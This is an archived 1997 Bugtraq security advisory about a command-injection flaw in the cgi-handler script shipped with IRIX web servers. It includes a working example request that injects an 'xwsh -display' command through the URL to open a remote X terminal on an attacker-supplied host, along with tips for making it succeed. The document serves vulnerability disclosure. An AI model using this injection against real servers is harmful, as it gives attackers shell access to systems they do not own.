cpio.07.97-07-23.irix_www
92d4dd04d65dd906cb694cbee19b8a2d4686ccdfcd524a1c1ceb9a9b5dae0992
From releases@CORINNE.MAC.EDU Sun Aug 10 00:38:46 1997
Date: Wed, 23 Jul 1997 12:17:56 -0500
From: Corinne Posse Releases <releases@CORINNE.MAC.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: CPSR 7: IRIX WWW Server
************** Corinne Posse Security Notice **************
Issue Number 7: 970723
***************** http://posse.cpio.org ******************
** (Please note our new address at cpio.org !!!) **
**** Systems Security and Safety-- known breech ****
Systems Affected:
ALL IRIX systems (Including 6.4) with the default web server installed,
any web server with the "cgi-handler" script installed.
Quite a while ago, Razvan Dragomirescu (drazvan@kappa.ro) released a
report on the default cgi-handler scripts that ship with IRIX systems
with web servers, and some other web server programs. Just like with
the phf bug, with the cgi-handler bug a malicious user could start
an xterm from the server machine on their own system.
Example:
telnet www.highly.respectable.bank.com 80
Trying 300.300.300.1...
Connected to www.highly.respectable.bank.com
Escape character is '^]'.
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
Please note the format of the "GET" querey. The above assumes xwsh is in the
PATH somewhere, and the "space" between "xwsh" and "-display" sould be a TAB.
In addition, please note that in theory this should also work for
/cgi-bin/wrap CGI script.
Concept by: jack0@cpio.org and others
Tested by: jack0@cpio.org
Edited by: jkatz@cpio.org